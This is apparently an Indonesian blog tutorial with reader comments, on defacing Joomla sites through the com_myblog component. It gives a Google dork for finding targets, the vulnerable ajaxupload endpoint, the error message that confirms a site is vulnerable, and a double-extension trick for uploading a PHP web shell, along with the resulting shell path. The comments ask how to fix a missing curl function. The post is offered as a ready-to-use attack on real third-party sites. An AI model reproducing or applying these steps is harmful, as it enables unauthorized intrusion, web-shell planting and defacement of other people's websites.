Oke kali ini saya mau share tutorial deface dengan Exploit com_myblog pada CMS Joomla. Exploitnya cukup mudah sehingga bisa langsung dipraktekkan.
Langsung saja
Google dork : inurl:/components/com_myblog/
Exploiter : download
Exploit : /index.php?option=com_myblog&task=ajaxupload
Jika kalian mendapat error
{error: ‘No file has been uploaded.’, msg: ” }
Tanda nya situsnya vuln.
Langsung eksekusi saja dengan exploiternya. Jalankan dengan xampp jika kalian menggunakan windows atau langsung buka di terminal jika di linux.
Untuk shell , supaya sukses upload dengan ekstensi php.xxxjpg / html.xxxjpg
Jika sukses maka akan ada notice seperti di screenshoot :
Shell akses :
localhost/images/shell.php.xxxjpg
Untuk yang kurang jelas bia lihat videonya disini :
Sekian tutor kali ini semoga bermanfaat.
PHP Fatal error: Call to undefined function curl_init() in /root/wew/exp.php on
line 3 ane gitu napa yah ?
install phpcurl
Web based ada gak?